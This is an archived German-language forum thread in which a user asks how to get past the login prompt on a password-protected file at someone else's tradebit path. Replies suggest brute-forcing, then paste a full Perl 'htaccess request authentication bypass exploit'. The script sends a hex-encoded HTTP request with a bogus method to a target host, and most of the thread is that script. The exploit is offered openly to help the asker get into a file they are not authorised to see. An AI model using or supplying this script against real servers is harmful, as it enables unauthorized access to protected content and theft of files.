Archiv verlassen und diese Seite im Standarddesign anzeigen : Wer kann Helfen ?
nilslissy
10.07.2009, 14:06
Tag,
Es geht um den Folgenden Link :
/wwwroot/tradebit/tradebit.com/usr/blackman1970/prv/5001/auction.rar
Ich will die datei auction.rar Downloaden.
Aber man wird nach Log und Pw Gefragt.
Frage:Kann man dies Umgehen ?
MfG,
Naja,
da kann man nur mit Bruteforce einige Jahrzehnte ausprobieren.
Um dir keine Blöde antwort zu geben, sag ichs mal so,
Es ist möglich es zu umgehen, du brauchst abber viel zeit einen guten rechner und eine gute I-Net Leitung
Wahrscheinlich eine .htaccess
EBFE hat vor kurzem ein htaccess Exploit gepostet.
Ich nehme mir mal die Freiheit es hier rein zu kopieren ;)
use IO::Socket;
use strict;
use warnings;
# __________________________________________________
#
# ------------------------------------------------
# | htaccess request authentication bypass exploit |
# ------------------------------------------------
#
# written by katharsis - www.katharsis.x2.to
#
# __________________________________________________
<<i;
( )
|\ _,--------._ / |
| `.,' `. / |
` ' ,-' '
\/ ( /
,-. ,-. `__,'
| \) ,' ) ,'.` |
`.#/) '.#_,' ) ))|
/ (_.)\ . -'//
( /\____/\ ) )`'\
\ |V----V|| ' , \
|`- -- -' ,' \ \ _____
___ | .' \ \ `._,-' `-
`.__,`---^---' \ ` -'
-.______ \ . / ______,-
`. ,'
The devil is and always has been a gentleman.
i
my $host = shift;
my $file = shift;
print "\n[ htaccess request authentication bypass exploit ]\n";
if (!$file)
{
print "\n usage htxploit.pl [host] [directory / file]";
print "\n example htxploit.pl www.victim.com /forums/\n\n";
exit;
}
my $socket = new IO::Socket::INET (
PeerAddr => $host,
PeerPort => '80',
Proto => 'tcp',
);
my $packet =
"\x4D\x58\x48\x5A\x4D\x58\x20".$file.
"\x20\x48\x54\x54\x50\x2F\x31\x2E\x31\n".
"\x48\x6F\x73\x74\x3A\x20".$host."\n\n\n";
print $socket $packet;
while(<$socket>)
{
print;
}
close($socket);
Powered by vBulletin® Copyright ©2024 Adduco Digital e.K. und vBulletin Solutions, Inc. Alle Rechte vorbehalten.